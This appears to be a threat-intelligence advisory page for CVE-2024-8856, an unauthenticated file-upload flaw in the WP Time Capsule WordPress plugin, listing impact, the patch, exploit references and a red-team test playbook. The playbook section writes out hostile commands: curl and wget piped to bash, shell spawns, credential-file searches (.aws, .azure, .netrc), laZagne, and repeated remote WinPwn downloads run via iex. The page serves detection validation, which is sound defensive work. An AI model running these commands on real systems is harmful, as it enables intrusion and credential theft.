CVE-2024-8856
Overview
This vulnerability is an arbitrary file upload flaw caused by the absence of file type validation within the UploadHandler.php component of the Backup and Staging by WP Time Capsule WordPress plugin. Additionally, the plugin lacks direct file access restrictions, allowing unrestricted upload functionality. These issues affect all plugin versions up to and including 1.22.21, specifically in the file upload handling mechanism.
Vulnerability Description
The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the the UploadHandler.php file and no direct file access prevention in all versions up to, and including, 1.22.21. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
Impact
An unauthenticated attacker can exploit this vulnerability to upload arbitrary files, including malicious scripts, to the web server hosting the WordPress site. This can lead to remote code execution, allowing full control over the affected server environment. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward from a remote network location. Successful exploitation may result in data compromise, site defacement, or further lateral movement within the hosting infrastructure.
Solution
Users should upgrade the Backup and Staging by WP Time Capsule plugin to version 1.22.22 or later, where the file upload validation and direct access restrictions have been implemented. Detailed patch information and remediation instructions are available from the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/fdc2de78-5601-461f-b2f0-c80b592ccb1b. Reviewing the plugin’s updated UploadHandler.php in the official WordPress plugin repository confirms the applied fixes.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Backup and Staging by WP Time Capsule plugin for WordPress arises from inadequate file type validation and a lack of direct file access prevention in the UploadHandler.php file. This flaw allows unauthenticated users to upload arbitrary files to the server hosting the affected WordPress site. The absence of stringent checks on the file types being uploaded means that malicious actors can exploit this weakness to upload potentially harmful scripts or executables. Once these files are on the server, they can be executed, leading to remote code execution, which poses a significant threat to the integrity and confidentiality of the web application and its underlying infrastructure.
Attackers can exploit this vulnerability through various vectors. For instance, they can craft a simple HTTP request that targets the upload functionality of the plugin, bypassing any authentication mechanisms. By uploading a web shell or other malicious payloads, attackers can gain control over the server, manipulate data, or pivot to other systems within the network. Additionally, the ease of exploitation means that even individuals with limited technical skills can leverage automated tools to target vulnerable installations, increasing the likelihood of widespread attacks. The potential for mass exploitation is particularly concerning, as it could lead to a significant number of compromised sites in a short period.
The real-world impact of this vulnerability is profound. Organizations relying on the affected plugin may face severe business risks, including data breaches, loss of sensitive information, and damage to their reputation. The ability for an attacker to execute arbitrary code on a server can lead to unauthorized access to databases, theft of customer data, or even the deployment of ransomware. Moreover, the financial implications of such incidents can be substantial, encompassing costs related to incident response, legal liabilities, and potential regulatory fines. The fallout from a successful attack can also erode customer trust, resulting in long-term damage to brand reputation and customer loyalty.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Backup and Staging by WP Time Capsule plugin to the latest version is crucial, as updates often include patches for known vulnerabilities. Additionally, organizations should conduct routine security audits and vulnerability assessments to identify and remediate weaknesses in their web applications. Employing web application firewalls (WAFs) can provide an additional layer of protection by filtering and monitoring HTTP traffic to and from the application, helping to block malicious requests. Furthermore, implementing strict file upload policies, such as allowing only specific file types and using server-side validation, can significantly reduce the risk of exploitation.
In conclusion, the vulnerability within the Backup and Staging by WP Time Capsule plugin poses a critical threat to WordPress sites, enabling unauthenticated attackers to upload arbitrary files and potentially execute malicious code. The implications of such an exploit are far-reaching, affecting both the security posture of organizations and their operational integrity. By adopting proactive detection and mitigation strategies, organizations can safeguard their web applications against this and similar vulnerabilities, thereby enhancing their overall cybersecurity resilience.
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting the Backup and Staging by WP Time Capsule plugin vulnerability. This increase in activity, coupled with the continued availability of multiple proof-of-concept exploits and a Metasploit module, underscores the vulnerability’s attractiveness to threat actors seeking unauthenticated remote code execution on WordPress sites. Our telemetry indicates that while the overall exploit trend remains stable, the recent uptick in detections suggests growing adversary interest and possible expansion in attack campaigns leveraging this flaw. This development elevates the urgency for defenders to maintain vigilant monitoring and reinforces the critical risk posture associated with this vulnerability, as exploitation attempts are becoming more frequent and potentially more sophisticated.
Update 2 — June 07, 2026
CSURFACE threat intelligence has observed a marked escalation in exploitation attempts targeting the WP Time Capsule plugin vulnerability, reflected by a significant rise in detection activity across diverse environments. This surge corresponds with the emergence of additional proof-of-concept exploits and enhanced scanning tools that facilitate rapid identification of vulnerable instances. The slight uptick in the EPSS score, while modest, signals sustained attacker interest and an increased likelihood of successful exploitation attempts. These developments underscore a growing operationalization of the vulnerability within attacker toolkits, elevating the threat landscape for WordPress sites running affected plugin versions. For defenders, this intensification means that opportunistic and targeted campaigns exploiting CVE-2024-8856 are becoming more frequent and potentially more sophisticated, increasing the urgency of continuous monitoring and timely patch management. Consequently, the risk level associated with this vulnerability has escalated from a stable to a heightened threat posture, reflecting its expanding exploitation footprint and the availability of multiple exploitation vectors.
Update 3 — June 19, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-8856, reflected by a modest rise in telemetry signals and a marginal uptick in the EPSS score. This subtle growth in activity indicates that adversaries continue to probe vulnerable WordPress sites running the affected WP Time Capsule plugin versions, maintaining pressure on unpatched environments. The emergence of multiple publicly available proof-of-concept exploits and integration into prominent exploitation frameworks underscores the vulnerability’s persistent attractiveness to attackers. Although the increase is not rapid or dramatic, it signals sustained adversary interest and ongoing reconnaissance efforts that could precede more aggressive campaigns. For defenders, this evolving landscape means that vigilance remains critical as the risk of successful remote code execution attacks persists. Consequently, the threat level associated with CVE-2024-8856 has shifted to a moderately elevated posture, reflecting a stable but persistent exploitation trend that demands continued attention.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Revmakx | Backup And Staging By Wp Time Capsule | All |
cpe:2.3:a:revmakx:backup_and_staging_by_wp_time_capsule:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress WP Time Capsule Arbitrary File Upload to RCE
exploits/multi/http/wp_time_capsule_file_upload_rce
|
Valentin Lobstein, Rein Daelman | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload | Al Baradi Joy | webapps | php | - | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ubaydev/CVE-2024-8856
WordPress WP Time Capsule Plugin Arbitrary File Upload Vulnerability
|
ubaydev | 2 | 1 | 2024-11-16 | View |
|
Jenderal92/CVE-2024-8856
This tool scans WordPress websites for vulnerabilities in the WP Time Capsule plugin related to CVE-2024-8856. It identi...
|
Jenderal92 | 2 | 0 | 2024-11-21 | View |
|
Evillm/CVE-2024-8856-PoC
|
Evillm | 0 | 0 | 2026-02-04 | View |
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-8856 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/fdc2de78-5601-461f-b2f0-c80b592ccb1b?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/wp-time-capsule/trunk/wp-tcapsule-bridge/upload/php/UploadHandler.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3188325/ |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3153289%40wp-time-capsule&new=3153289%40wp-time-capsule&sfp_email=&sfph_mail= |
| hacked.be |
GitHub CVE
|
https://hacked.be/posts/CVE-2024-8856 |